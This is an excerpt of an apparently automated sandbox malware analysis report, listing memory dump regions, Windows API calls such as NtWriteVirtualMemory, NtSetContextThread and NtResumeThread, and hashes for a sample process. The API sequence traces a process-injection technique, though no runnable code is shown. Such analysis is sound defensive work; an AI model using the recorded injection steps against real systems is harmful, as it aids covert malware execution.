                                                          • NtSetContextThread.NTDLL(?,?), ref: 0AC9DFD7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 89340b9b1d78e4663c6b0f157f708397d9ab91bf80866da1cbd4115fe39e7d6c
                                                          • Instruction ID: d06332950303e9150b8593567f9550b615c86c7fa070704121cf24a27e0e4eef
                                                          • Opcode Fuzzy Hash: 89340b9b1d78e4663c6b0f157f708397d9ab91bf80866da1cbd4115fe39e7d6c
                                                          • Instruction Fuzzy Hash: 8A41ABB5D002589FCB10CFA9D885AEEFBB1BB49310F14842AE419B7240D734AA45CF64
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DEA0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 353656bf12e84a289396cb34050a2efec41878a30476a40ef170db5959d08286
                                                          • Instruction ID: d5ae587f65e5c8a48e64798ef403b3f2435e7124036b92cfe5c517877b69321b
                                                          • Opcode Fuzzy Hash: 353656bf12e84a289396cb34050a2efec41878a30476a40ef170db5959d08286
                                                          • Instruction Fuzzy Hash: A241ACB5D012589FCF10CFA9D984AEEFBF1BB59310F14902AE819B7240D735AA45CF54
                                                          APIs
                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DAAA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: MemoryReadVirtual
                                                          • String ID:
                                                          • API String ID: 2834387570-0
                                                          • Opcode ID: 98b420896cf43468113bff4b016407aa117efca6bff5b292e96e5ad14b96b954
                                                          • Instruction ID: f101291a291b3883396ba25d6a0b6e33f339be3ce6ecde4ab3926c12eaad2832
                                                          • Opcode Fuzzy Hash: 98b420896cf43468113bff4b016407aa117efca6bff5b292e96e5ad14b96b954
                                                          • Instruction Fuzzy Hash: 4241BAB9D042589FCF10CFA9D884AEEFBB5BB59310F14902AE815B7200C739A945DF68
                                                          APIs
                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DAAA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: MemoryReadVirtual
                                                          • String ID:
                                                          • API String ID: 2834387570-0
                                                          • Opcode ID: ec9974830421e074dc5fdca2f5950a446547cf2b6887621a652f8488400601f4
                                                          • Instruction ID: c5d74b18c780c4d6703b21608c48b18d5b32627efd11c247a5545640629d2ebd
                                                          • Opcode Fuzzy Hash: ec9974830421e074dc5fdca2f5950a446547cf2b6887621a652f8488400601f4
                                                          • Instruction Fuzzy Hash: 1041A9B9D04258DFCF10CFAAD984AEEFBB5BB59310F14942AE815B7200C735A945CF68
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa8bf13fa06938585a78741d29b48205ada2e5a4a51302c0dc86e9ace186061b
                                                          • Instruction ID: 199885c02f94e011ff3ebb04cd98c9dd33d5728119412f167b841289df88a1f9
                                                          • Opcode Fuzzy Hash: aa8bf13fa06938585a78741d29b48205ada2e5a4a51302c0dc86e9ace186061b
                                                          • Instruction Fuzzy Hash: ED41CCB9D052089FCB11CFA8D884A9EFFF1AF49314F1580AAE815B7241DB35A946CF54
                                                          APIs
                                                          • NtSetContextThread.NTDLL(?,?), ref: 0AC9DFD7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 3b356057430cba3f84b95e65a13d58baf0fe1c8e853388de1e047332d7ac1ad1
                                                          • Instruction ID: a47be4eeb63e2c9ecb4cadd000e05a536316d4ab7e11a9d4ad9684a28585e223
                                                          • Opcode Fuzzy Hash: 3b356057430cba3f84b95e65a13d58baf0fe1c8e853388de1e047332d7ac1ad1
                                                          • Instruction Fuzzy Hash: 9931A9B5D002589FCB10CFAAD985AEEBBF1BB49310F14842AE419B7240C738A945CF64
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0AC9DC39
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 546105cb55f96fd6bdc8f115ff03aa0a44f9cb226dc2f7c7c0fc9bff9abf0cf9
                                                          • Instruction ID: 8cdad62f1d73d0a268304527367eafc2d4e76ea3d27b3625251e3709710b3650
                                                          • Opcode Fuzzy Hash: 546105cb55f96fd6bdc8f115ff03aa0a44f9cb226dc2f7c7c0fc9bff9abf0cf9
                                                          • Instruction Fuzzy Hash: A331C8B9D012189FCF10CFA9D984A9EFBF5FB49314F10942AE805B7200C779A946CFA4
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 0AC9DC39
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: a93322e630d72076f4bcdf62e761268e141d0543d18a5b6a50ad2b3f49edfdca
                                                          • Instruction ID: 7a2d3715ced7869999d59506e9478020cd4f4a46639406a21c75ceeda463b04d
                                                          • Opcode Fuzzy Hash: a93322e630d72076f4bcdf62e761268e141d0543d18a5b6a50ad2b3f49edfdca
                                                          • Instruction Fuzzy Hash: CC31B8B9D012189FCF10CFA9D984A9EFBF5FB49310F10942AE815B7200C775A946CFA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <
                                                          • API String ID: 0-4251816714
                                                          • Opcode ID: a5117db7ee118d9a10855cbf65171bb5827cbf65c50dd15811c7f9d52a9a5dd4
                                                          • Instruction ID: 3663704547245137a97c113b0eca0740ce037bb0a9ae7d4df6047881b6393824
                                                          • Opcode Fuzzy Hash: a5117db7ee118d9a10855cbf65171bb5827cbf65c50dd15811c7f9d52a9a5dd4
                                                          • Instruction Fuzzy Hash: 81918FB5E01658CFDB54CFAAC9806DDBBF2BF89300F1581AAD508AB325D7349A81CF54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LV=
                                                          • API String ID: 0-142187384
                                                          • Opcode ID: 73bc38d0c16fb05278e031d1f25560c6f317bac999ec5c40ddc9bf5ed10319d7
                                                          • Instruction ID: 88f7bc0690ac78a90fa786db38cab9eaa7463b41135a629d09e901f8afaea9b2
                                                          • Opcode Fuzzy Hash: 73bc38d0c16fb05278e031d1f25560c6f317bac999ec5c40ddc9bf5ed10319d7
                                                          • Instruction Fuzzy Hash: 9071C2B5E012198FDB08CFE9D8846AEFBF2FB89301F24852AD919AB358D7345905CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &[
                                                          • API String ID: 0-1761963930
                                                          • Opcode ID: 538d8114b7ed96839d347f59c2c8a1404a2474aaa14c7decec93c9f1314f3ee5
                                                          • Instruction ID: 20a971e1aeacbf36dce5af6ee77aa772f120db4aa5a1369ea2ad88a0ef68f5fa
                                                          • Opcode Fuzzy Hash: 538d8114b7ed96839d347f59c2c8a1404a2474aaa14c7decec93c9f1314f3ee5
                                                          • Instruction Fuzzy Hash: 36512970E052098FEB48CFAAD9406EEFBF2AF89300F15D52AD555A7364D3349A01CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 8eaad3a29b228b92317360c7a02332263288be913a827fcc68864f9f034f093c
                                                          • Instruction ID: 231bb280b97edadd7bbd9724d02ffedd5d322a918b876b5bf7e448b521c4904e
                                                          • Opcode Fuzzy Hash: 8eaad3a29b228b92317360c7a02332263288be913a827fcc68864f9f034f093c
                                                          • Instruction Fuzzy Hash: 7521E071E016199BEB58CF6BD844ADEFBF7BFC9200F04C1B6C418AA268DB3409458F11
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f442055ee0d3663ea9a2845c10e87ced4efdffe6757a0bc31a7a4a8ebe0ce46c
                                                          • Instruction ID: 84bd154b4f317df6ab0b3df0905ba46035926495f27fdebce4edba8c79f5193d
                                                          • Opcode Fuzzy Hash: f442055ee0d3663ea9a2845c10e87ced4efdffe6757a0bc31a7a4a8ebe0ce46c
                                                          • Instruction Fuzzy Hash: C8A10474E00218DFDB18DFA9D49499EBBF2FF89301F24816AE419AB365DB30A945CF50
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 814468de5c30e72b774b0247d079c90ff368fe18a51aa5c434ccd37d57cd9912
                                                          • Instruction ID: 69896ae71a49e04731bb31eb24b481cf41f4b9defdf004e3b2a96123b3ed6fa5
                                                          • Opcode Fuzzy Hash: 814468de5c30e72b774b0247d079c90ff368fe18a51aa5c434ccd37d57cd9912
                                                          • Instruction Fuzzy Hash: 4591B074E01218DFDB18CFA6D9846DDFBB2FB88310F11952AD809EB264EB3499058F14
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e7900f399d9662b983ae51f66af45b4ed094299bdf6649fd921f44874d09715
                                                          • Instruction ID: 246afc1e957f84f1c772ddfcd946c4cf65e5b93aa7e490ccdabcef5ae719d4e6
                                                          • Opcode Fuzzy Hash: 7e7900f399d9662b983ae51f66af45b4ed094299bdf6649fd921f44874d09715
                                                          • Instruction Fuzzy Hash: D1512D75E0521A8FCB48CFAAC4405AEFBF2FF89300F14D46AD415AB2A4D7349A42CF94
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4924c90654ac3f4fffe573e511bbf325437c1fc2e48a57b9f1ecac13ffb98d74
                                                          • Instruction ID: df505e2d55a86635adb47dbd75c33a901838c3deaadea928c5a0238a5eb26fa2
                                                          • Opcode Fuzzy Hash: 4924c90654ac3f4fffe573e511bbf325437c1fc2e48a57b9f1ecac13ffb98d74
                                                          • Instruction Fuzzy Hash: A66135B0D05209EFCF58CFA6E4486AEBBB1FB89301F119429D41ABB264D7745A41CF51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2c06c57c243183f7f1be45d28f1285fa187afdfdf057391e4df3e83a93cb833
                                                          • Instruction ID: 1a00ccc017fd80aa0a23fc11c7635d6b4df0eff1fd56b913ba7f0d6ad90e2c0e
                                                          • Opcode Fuzzy Hash: b2c06c57c243183f7f1be45d28f1285fa187afdfdf057391e4df3e83a93cb833
                                                          • Instruction Fuzzy Hash: CF6137B5D0520AEFCF58CFA6E4486AEBBB1FF89301F11842AD41AA7264D7784A41CF51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cf1b2d8afae930ec92da4a7e056f9794511ec56687bb15435a8efa42f3fe1d8d
                                                          • Instruction ID: 6ded6738b62b0b753c9598774fb849668c0cb3713be08ee4e5c6192083585b50
                                                          • Opcode Fuzzy Hash: cf1b2d8afae930ec92da4a7e056f9794511ec56687bb15435a8efa42f3fe1d8d
                                                          • Instruction Fuzzy Hash: 1951EA75E012289FDB68CF6AC8456D9FBB6EB99310F15C0EAD50DA7314DB309E828F50
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e302b222ae88bf371a9fb2caccdeb15d7cbd823fd3e2fd0b754e3e0a5612abd
                                                          • Instruction ID: 7325a62122a2c2026ea1f2ad8e6931b5dbac5b69f4ca01ed1ab9cb5177a8a441
                                                          • Opcode Fuzzy Hash: 2e302b222ae88bf371a9fb2caccdeb15d7cbd823fd3e2fd0b754e3e0a5612abd
                                                          • Instruction Fuzzy Hash: B8313A71E016588FDB58CFAAD8546DEBBF3AFC9300F14C0AAD409AB268DB341A45CF41
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f9f8b3aba97e55f09b4532ee393e86f334df1a6f9695cb92a17e3c99397f8a5
                                                          • Instruction ID: 4bef30767a158914c26ba09a7b794fa180c1e148e517f7894bb9a3e2a997ad4e
                                                          • Opcode Fuzzy Hash: 8f9f8b3aba97e55f09b4532ee393e86f334df1a6f9695cb92a17e3c99397f8a5
                                                          • Instruction Fuzzy Hash: 2431FCB1E016188BDB58CF9AD8447DEBBF3BFC9310F14C16AD409AA268DB740A49CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 838 2df9920-2df994e 839 2df9955-2df995a 838->839 840 2df9950 838->840 853 2df995d call 2df9a32 839->853 854 2df995d call 2df9a40 839->854 840->839 841 2df9963-2df9969 842 2df9971 841->842 843 2df9978-2df9994 842->843 844 2df999d-2df999e 843->844 845 2df9996 843->845 848 2df9a11-2df9a15 844->848 845->842 845->844 846 2df99bc-2df99d6 845->846 847 2df99d8-2df99de 845->847 845->848 849 2df99a0-2df99ba 845->849 846->843 850 2df99f1-2df99f8 847->850 851 2df99e0-2df99ef 847->851 849->843 852 2df99ff-2df9a0c 850->852 851->852 852->843 853->841 854->841
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @Vh:$yl9]
                                                          • API String ID: 0-3465494468
                                                          • Opcode ID: 0d3bec54d4f3af91503a2a462750f2fc80552382a83dcdd94b4062081138363a
                                                          • Instruction ID: 2eb4339940ce34a2621111fb297d8df7ae3a27ccb19e0777eb01a7c0c5247a7f
                                                          • Opcode Fuzzy Hash: 0d3bec54d4f3af91503a2a462750f2fc80552382a83dcdd94b4062081138363a
                                                          • Instruction Fuzzy Hash: B33168B0D09209EFCB44CFAAC5906EEFBF2EF84300F51D5AA9509A7355E7308A41CB45
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01521877
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 02b733d4d1ed3f96cd8c72e69f1479bff20e64388bbee02895fd520043089f41
                                                          • Instruction ID: 0458db42d0bf967c6adfc96454c329847edc7561bba6479cd89975c947ddfb15
                                                          • Opcode Fuzzy Hash: 02b733d4d1ed3f96cd8c72e69f1479bff20e64388bbee02895fd520043089f41
                                                          • Instruction Fuzzy Hash: F55125B4C042499FCB54CFA4D8849DEFBB5FF85320F15826EE454ABA11D339A986CF60
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AC9DD5A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: d6a541376e5b5fcd7e8864f2d22b1f7faab9c9950e5d447cbab848a1823b92af
                                                          • Instruction ID: 9c6fc9023f1fc711703d33f065b6ee8ac631ef94aac57da2f5ec20a8a2c6016a
                                                          • Opcode Fuzzy Hash: d6a541376e5b5fcd7e8864f2d22b1f7faab9c9950e5d447cbab848a1823b92af
                                                          • Instruction Fuzzy Hash: A5419AB9D002589FCF10CFA9D984ADEFBB5FB59310F10942AE819B7210D735A946CF64
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AC9DD5A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 8cf54a287a328f391606d7fe234825f001bdb76619726643405f4248c40f7ab5
                                                          • Instruction ID: 954a44676142075106af799cb54668704cca1c012ca901080f282052ec29c098
                                                          • Opcode Fuzzy Hash: 8cf54a287a328f391606d7fe234825f001bdb76619726643405f4248c40f7ab5
                                                          • Instruction Fuzzy Hash: 4A3189B9D002589FCF10CFA9D984ADEFBB5FB59310F10942AE819B7210D735A945CF64
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01521877
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 5ba2c9c99fa7f14080912cddfc87b985e3ae80973f605c29945632dc99ae33e0
                                                          • Instruction ID: d0dd6b188eed7af1ac4cfe2b8b3dc5fc8339109076c7f149e91cabe9a8051cb3
                                                          • Opcode Fuzzy Hash: 5ba2c9c99fa7f14080912cddfc87b985e3ae80973f605c29945632dc99ae33e0
                                                          • Instruction Fuzzy Hash: 8A3197B9D042589FCB10CFA9D984ADEFBF4BB1A310F24902AE814B7250D375A945CF64
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0152A357
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: a563a710153f1fdb97f4bd4e0bb2fe525eaa456b427930e79727c05d646f93b1
                                                          • Instruction ID: 7e5f189bf5d9d9f7b30c274daa3296ac4004ffaf2a37e5e596c9f6447b631315
                                                          • Opcode Fuzzy Hash: a563a710153f1fdb97f4bd4e0bb2fe525eaa456b427930e79727c05d646f93b1
                                                          • Instruction Fuzzy Hash: AA3197B9D04258DFCB10CFA9D984ADEFBF4BB5A310F24902AE814B7250D375A945CF64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: r>
                                                          • API String ID: 0-2908804962
                                                          • Opcode ID: ee20dbe36b79502da07d3932120d0894778d3fb847f424d01dfe3b49fbabdec2
                                                          • Instruction ID: 15150d14c848c0ec528178a58fa652c016c2bac62c6670923c5a5293056b8492
                                                          • Opcode Fuzzy Hash: ee20dbe36b79502da07d3932120d0894778d3fb847f424d01dfe3b49fbabdec2
                                                          • Instruction Fuzzy Hash: 742122B590A255DFDB94CBB8E4480DC7FB1FF86216B9980EAC145E2236D7348E0BCB14
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503635454.000000000AF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_af50000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,
                                                          • API String ID: 0-3772416878
                                                          • Opcode ID: c9bdf25b31b564bd498c14035252d06f4d98e188fcf62306865302c78282ac5b
                                                          • Instruction ID: 0bf123f2152fc355bf20d1e0a450c616833ec2d2c9c54cf75c07c3887d42bda0
                                                          • Opcode Fuzzy Hash: c9bdf25b31b564bd498c14035252d06f4d98e188fcf62306865302c78282ac5b
                                                          • Instruction Fuzzy Hash: 1021C2B49402289FDB64DF68D984BDDBBB6AB58300F1084D9A54CA7350DB74AEC18F64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U
                                                          • API String ID: 0-3372436214
                                                          • Opcode ID: 9ccf463d8cc9202b31f34539f391353e50725967ddc3d6519f610a65c1a4ce4f
                                                          • Instruction ID: bcd521098fa47b9cf54d22e32a3351289a91aea94a621771a108b7b6cd763d39
                                                          • Opcode Fuzzy Hash: 9ccf463d8cc9202b31f34539f391353e50725967ddc3d6519f610a65c1a4ce4f
                                                          • Instruction Fuzzy Hash: 1F115E759042899FCB41CFA8C4505EEBFF1BF49301F05806AE658AB391D7349E04CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: r>
                                                          • API String ID: 0-2908804962
                                                          • Opcode ID: 0821d17f327ae3882babc9e2e95751d5b764efb9f2ec26a8cb7f247461022414
                                                          • Instruction ID: 6ad7b53293a16c4ba6f5cee7cc794d871321220c99436996411b207434b43a49
                                                          • Opcode Fuzzy Hash: 0821d17f327ae3882babc9e2e95751d5b764efb9f2ec26a8cb7f247461022414
                                                          • Instruction Fuzzy Hash: 24019270A06209EFCB94DFB4E54855DBFF2BB89206F64C4A9D109E3728D7309E05CB04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503635454.000000000AF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_af50000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR_q
                                                          • API String ID: 0-2241839734
                                                          • Opcode ID: ff4f373d318b0b664b7fd81e591a6b619cba2a5a0912e6436bfcd7c964ced12c
                                                          • Instruction ID: 9f28f162e6e245df4994f4428aed01dea836053379efdbdc54dc69f4d8e834dc
                                                          • Opcode Fuzzy Hash: ff4f373d318b0b664b7fd81e591a6b619cba2a5a0912e6436bfcd7c964ced12c
                                                          • Instruction Fuzzy Hash: 56F03730D0011DAEDF24DFA1DD40ADCBBB6FF45300F2080AAA509B7154DA305F569F00
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503635454.000000000AF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_af50000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8b89c78b3900a7039fe5403b93a7a7f6067b806738965f5c32a63cdd38481db7
                                                          • Instruction ID: 31a88a8007ff774e4e6b827b6474e0b39887e0f7d58756cc21be1b8c151b84b1
                                                          • Opcode Fuzzy Hash: 8b89c78b3900a7039fe5403b93a7a7f6067b806738965f5c32a63cdd38481db7
                                                          • Instruction Fuzzy Hash: DA51D275E002099FCF44DFA9D850AEEBBB2FF88310F14812AD919AB354DB34A902CF54
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1503635454.000000000AF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_af50000_mjtjewi.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
